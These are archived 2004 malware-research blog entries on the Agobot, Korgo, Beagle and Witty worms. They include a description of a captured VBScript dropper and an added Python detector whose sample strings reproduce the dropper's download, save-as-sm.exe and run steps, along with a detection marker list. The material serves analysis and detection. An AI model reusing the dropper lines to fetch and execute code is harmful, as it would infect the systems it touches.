2004 VECTORBLOG ENTRIES

The Vectorblog gained momentum in 2004, leading to the diary that exists today. The entries below are the random lines entered prior to August 2004.

July 3, 2004

Bot net. Although the release of another variant of Agobot (NL on Trend Micro's site) is hardly news, it corresponds to the release of a new report at infectionvectors.com, "Agobot & the 'Kit'-chen Sink." Check it out in the Vector Spaces section. The report analyzes the kit that constructs Agobot Trojans and where the kit belongs in virus kit history. The new Agobot: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_AGOBOT.NL

June 5, 2004

LSASS Cargo. The Korgo worm shows potential for spreading as quickly as Sasser, except that many more machines should be patched by this point. For the cynics out there: at least many more corporate machines should be patched by now, relegating this to a home user problem.

April 1, 2004

4/1/04. Maybe this is Beagle's April Fools' joke, but the following packet was snatched by a honeypot machine and seems to indicate some behavior different from what is expected with Q-T. Check out this packet for the use of a private IP address. The address that is supposed to appear there is from the list of hard coded servers in the Beagle code, not the machine that was infected (which would be more of a P2P propagation). This was submitted to AV vendors for some clarification, but as of yet, there is no documented reason that any of the known Beagle variants would insert this address.

[Packet hex dump omitted. Its ASCII column is an HTML page carrying a VBScript dropper that fetches http://192.168.34.20:81/maucxrd.jpeg, saves it as sm.exe via ADODB.Stream and runs it via WScript.Shell.]
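One way to automate the check this entry describes, pulling the download URL out of a captured VBScript dropper and flagging a host in RFC 1918 space where one of Beagle's hard-coded public servers would be expected. This is an added example, not the blog's code: the sample payloads are constructed (modelled on the dropper text in the capture), 198.51.100.7 is a documentation placeholder, and the function names and marker list are the example's own.

```python
import ipaddress
import re

# Constructed sample payloads (not the captured bytes), modelled on the VBScript
# dropper text that appears in the ASCII column of the honeypot packet.
SAMPLE_PRIVATE = (
    'TSO.write "xml.Open ""GET"", ""http://192.168.34.20:81/maucxrd.jpeg"", False" & vbcrlf\r\n'
    'TSO.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf\r\n'
    'TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf\r\n'
    'TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf\r\n'
    'TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf\r\n'
)
# Same dropper pointing at a public address (198.51.100.7 is a documentation placeholder).
SAMPLE_PUBLIC = SAMPLE_PRIVATE.replace("192.168.34.20:81", "198.51.100.7")
# An ordinary page fragment with a private-space link but none of the dropper machinery.
BENIGN = '<a href="http://10.0.0.5/index.html">home</a>'

# Strings that together mark the download / save-to-disk / execute pattern of this dropper.
DROPPER_MARKERS = ("ADODB.Stream", "SaveToFile", "WScript.Shell", ".Run ")
URL_RE = re.compile(r'https?://([^/\s:"]+)(?::(\d+))?')
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def extract_hosts(payload):
    """Return (host, port) for every URL in the payload; the port defaults to 80."""
    return [(m.group(1), int(m.group(2) or 80)) for m in URL_RE.finditer(payload)]


def is_rfc1918(host):
    """True only for literal IPv4 addresses inside the RFC 1918 private ranges."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not an address literal
    return addr.version == 4 and any(addr in net for net in RFC1918)


def assess(payload):
    """Classify a captured payload: clean, dropper, or dropper fetching from private space."""
    markers = [m for m in DROPPER_MARKERS if m in payload]
    hosts = extract_hosts(payload)
    private = [h for h, _ in hosts if is_rfc1918(h)]
    verdict = "clean"
    if len(markers) >= 2:  # a single marker alone turns up in plenty of benign script
        verdict = "dropper-private-source" if private else "dropper"
    return {"markers": markers, "hosts": hosts, "private_hosts": private, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in (("private", SAMPLE_PRIVATE), ("public", SAMPLE_PUBLIC), ("benign", BENIGN)):
        print(name, assess(sample)["verdict"], assess(sample)["hosts"])
```

A "dropper-private-source" verdict is the anomaly the entry points at: the fetch address sits in RFC 1918 space, which cannot be one of the hard-coded public servers.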
March 21, 2004

Witty rejoinder. For readers of the blog (especially those with ISS products in place), a packet from the scary Witty worm and a link to Symantec's analysis:

12:54:45 10.10.10.1.4000 > 10.10.10.2: udp 997
...{....F...F... 0x0400 80 . Witty: http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
Copyright © 2004 infectionvectors.com. All rights reserved.